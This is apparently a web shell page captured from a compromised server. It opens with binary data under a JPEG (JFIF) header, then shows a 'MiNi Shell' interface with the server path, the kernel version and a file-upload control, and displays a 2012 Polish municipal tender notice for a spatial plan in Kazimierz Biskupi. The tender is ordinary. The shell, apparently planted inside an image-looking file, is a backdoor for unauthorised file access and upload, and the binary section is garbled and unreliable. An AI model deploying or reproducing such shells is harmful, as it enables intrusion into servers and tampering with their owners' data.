JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120109/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120109/6954-N-2012.html

<p class="kh_header"><b>Kazimierz Biskupi: Opracowanie miejscowego planu zagospodarowania przestrzennego terenów położonych w Jóźwinie, Komorowie, Stefanowie, Nieświastowie i Bochlewie</b><br>
<b>Numer ogłoszenia: 6954 - 2012; data zamieszczenia: 09.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , Plac  Wolności 1, 62-530 Kazimierz Biskupi, woj. wielkopolskie, tel. 063 2411210, faks 063 2411215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kazimierz-biskupi.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie miejscowego planu zagospodarowania przestrzennego terenów położonych w Jóźwinie, Komorowie, Stefanowie, Nieświastowie i Bochlewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem opracowania jest miejscowy plan zagospodarowania przestrzennego o nazwie: Miejscowy plan zagospodarowania przestrzennego terenów położonych w Jóźwinie, Komorowie, Stefanowie, Nieświastowie i Bochlewie gm. Kazimierz Biskupi.

Według procedury i problematyki określonej w ustawie z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu  przestrzennym (Dz.U.Nr 80, poz. 717 ze zm.) zwanej dalej ustawą.

II.  Dane podstawowe.
Podstawa opracowania:
- ustawa o planowaniu i zagospodarowaniu przestrzennym z dnia 27 marca 2003r. (Dz.U. Nr 80, poz.717 ze zm.),
- rozporządzenie  Ministra Infrastruktury w sprawie wymaganego zakresu projektu 
  miejscowego planu zagospodarowania przestrzennego z dnia 26 sierpnia 2003r.(Dz.U.Nr 164, poz.1587),
- uchwała nr XII,75,11 Rady Gminy Kazimierz Biskupi  z dnia 21 lipca 2011r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego terenów położonych w Jóźwinie, Komorowie, Stefanowie, Nieświastowie i Bochlewie gm. Kazimierz Biskupi.

 III. Granice i obszar opracowania.
Granice obszaru opracowania miejscowego planu zagospodarowania przestrzennego są określone na mapach stanowiących załączniki 1 - 3 do uchwały nr XII,75,11 Rady Gminy Kazimierz Biskupi z dnia 21 lipca 2011r. 

IV. Zakres opracowania.
Analiza i ocena stanu istniejącego (część graficzna i część tekstowa)
1.Analiza wniosków do projektu miejscowego planu zagospodarowania przestrzennego.
2.Wykonanie projektu miejscowego planu zagospodarowania.
3. Sporządzenie prognozy skutków finansowych uchwalenia miejscowego planu   
    zagospodarowania przestrzennego.
 
Prognoza powinna uwzględniać:
   - prognozę wpływu ustaleń planu na dochody własne i wydatki gminy, w tym wpływ z podatku od nieruchomości i inne dochody związane z obrotem nieruchomościami gminy oraz na opłaty i odszkodowania, o których mowa w art.36 ustawy o planowaniu i zagospodarowaniu przestrzennym,
- prognozę wpływu ustaleń planu na wydatki związane z realizacją inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych gminy,
- wnioski i zalecenia dotyczące przyjęcia proponowanych rozwiązań planu, wynikające z uwzględnieniem skutków finansowych.

4. Przedłożenie projektu miejscowego planu Komisji Urbanistyczno - Architektonicznej do zaopiniowania oraz wprowadzenie ewentualnych zmian.
5. Uzyskanie opinii i uzgodnień projektu planu.
6. Wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii i uzgodnień.
7. Wyłożenie projektu planu do publicznego wglądu i przeprowadzenie dyskusji publicznej nad rozwiązaniami przyjętymi w projekcie planu.
8. Zakończenie składania uwag do projektu planu.
9. Przygotowanie propozycji rozstrzygnięcia uwag  złożonych do projektu planu.
10. Rozpatrzenie uwag przez Wójta Gminy.
11.Wprowadzenie zmian do projektu planu wynikających z rozpatrzenia uwag na etapie wyłożenia do publicznego wglądu.
12. Powtórzenie procedury w niezbędnym zakresie.
13. Przedstawienie projektu planu do uchwalenia.
14. Skompletowanie dokumentacji prac planistycznych.
15.Przygotowanie projektu planu z dokumentacją prac planistycznych do przedstawienia Wojewodzie Wielkopolskiemu.
16. Zakończenie następuje po pozytywnej ocenie przez wojewodę uchwały wraz z 
załącznikami i dokumentacją planistyczną w zakresie zgodności z przepisami prawa.

V. Obowiązki Wykonawcy obejmują:
W ramach realizacji zlecenia Wykonawca zapewnia:
1. Przygotowanie ogłoszenia oraz obwieszczenia o przystąpieniu do sporządzenia 
miejscowego planu oraz przygotowanie propozycji rozstrzygnięcia wniosków złożonych do wyżej wymienionego planu.
2. Ewentualne powtórzenie części procedury w niezbędnym zakresie.
3. Przygotowanie pism wraz z projektem planu do opiniowania i uzgodnień z właściwymi organami; obejmuje to edycję zawiadomień, zaadresowanie kopert i potwierdzeń odbioru z powielaniem projektów planów w niezbędnej ilości egzemplarzy.
4. Przygotowanie ogłoszeń i obwieszczeń o terminie wyłożenia projektu planu do 
publicznego wglądu.
5. Obsługa wyłożenia projektu planu do publicznego wglądu (wymagany udział głównego projektanta planu - urbanisty minimum 1 dzień w tygodniu przez 6 godzin).
6. Zorganizowanie w okresie wyłożenia dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami i sporządzenie protokółu z przeprowadzenia dyskusji.
7. Przygotowanie projektu uchwały Rady Gminy wraz z listą nieuwzględnionych uwag z propozycją uzasadnień ich rozstrzygnięcia w czasie gwarantującym Wójtowi Gminy Kazimierz Biskupi ich rozpatrzenie z zachowaniem ustawowego terminu, 
8. Przygotowanie ostatecznej wersji projektu uchwały do uchwalenia. 
Ponadto główny projektant planu - urbanista zobowiązany jest do udziału i prezentacji (w zależności od potrzeb):
-  Gminnej  Komisji Urbanistyczno - Architektonicznej,
-  na posiedzeniach komisji Rady Gminy Kazimierz Biskupi,
-  na sesji Rady Gminy Kazimierz Biskupi dotyczącej uchwalenia projektu planu,
-  w uzgodnieniach i innych czynnościach procedury planistycznej.
   Wykonawca odpowiada za prawidłowość i zgodność z prawem procedury planistycznej.

VI.  Forma ostateczna.
Projekt planu powinien obejmować:
a) rysunek planu na CD w formacie  Jpeg.
b) projekt ustaleń planu w formie uchwały Rady Gminy Kazimierz Biskupi w pełnej  
    problematyce,
 c) prognozę skutków finansowych uchwalenia planu,
 d) rysunek planu w grafice barwnej w skali 1 : 2000, w czytelnej grafice umożliwiającej identyfikację  własności,
e) załączniki zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 26.08.2003 r. w sprawie wymaganego zakresu projektu m.p.z.p.
Projekt planu oraz prognoza winny być sporządzone oraz zawierać elementy określone w ustawie o planowaniu i zagospodarowaniu przestrzennym  oraz innych przepisach prawa.
Całość tekstu i tabel należy załączyć w formie elektronicznej w formacie Microsoft Word.

W formie wydruku dla  każdego planu należy przedstawić:
   - rysunek planu
   5 egz. W grafice barwnej w skali 1 : 1000.   

VII. Materiały projektowe dostarczane przez Zamawiającego

- Uchwała Nr XII,75,11   Rady Gminy Kazimierz Biskupi z dnia  21 lipca 2011roku     w sprawie przystąpienia  do sporządzenia miejscowego planu zagospodarowania przestrzennego terenów położonych w Jóźwinie, Komorowie, Stefanowie, Nieświastowie i Bochlewie gm. Kazimierz Biskupi.
- Obowiązujące na terenach opracowania miejscowe plany zagospodarowania przestrzennego.
- Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Kazimierz Biskupi.
- Prognoza oddziaływania na środowisko.
- Mapy geodezyjne.
- Ekofizjografia.
- Wnioski do miejscowego planu zagospodarowania przestrzennego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2, 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu nie jest wymagane wniesienie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku 
Warunek ten będzie uznany za spełniony przez Wykonawcę, jeżeli:
1.1. W okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej jeden miejscowy plan zagospodarowania przestrzennego o powierzchni nie mniejszej niż 700 ha związany z problematyką elektrowni wiatrowych sporządzony w trybie ustawy z dnia 27.03.2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80, poz. 717 z późn. zm.), który został ogłoszony w Dzienniku Urzędowym Województwa wraz z dokumentami potwierdzającymi, że usługi zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku 
1.1.Warunek ten będzie uznany za spełniony przez Wykonawcę, jeżeli wykaże, że dysponuje w okresie przewidzianym na realizację zamówienia osobą, tj. głównym projektantem planu - urbanistą</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy pod warunkiem wystąpienia co najmniej jednej z niżej wymienionych okoliczności:
4.1. Konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy lub w okolicznościach Siły Wyższej,
4.2. Zmiany są konieczne w związku ze zmianami przepisów prawa,
4.3. Zmiany są korzystne dla Zamawiającego,
4.4. Gdy rozpatrzenie sprawy zależy od uprzedniego rozstrzygnięcia przez inny organ.
4.5. Gdy zaistnieje konieczność ponownego uzgadniania i opiniowania projektu planu oraz ponownego wyłożenia do publicznego wglądu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kazimierz-biskupi.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Kazimierzu Biskupim
ul. Plac Wolności 1
62-530 Kazimierz Biskupi.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2012 godzina 09:30, miejsce: pokój nr 12 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 12.02.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com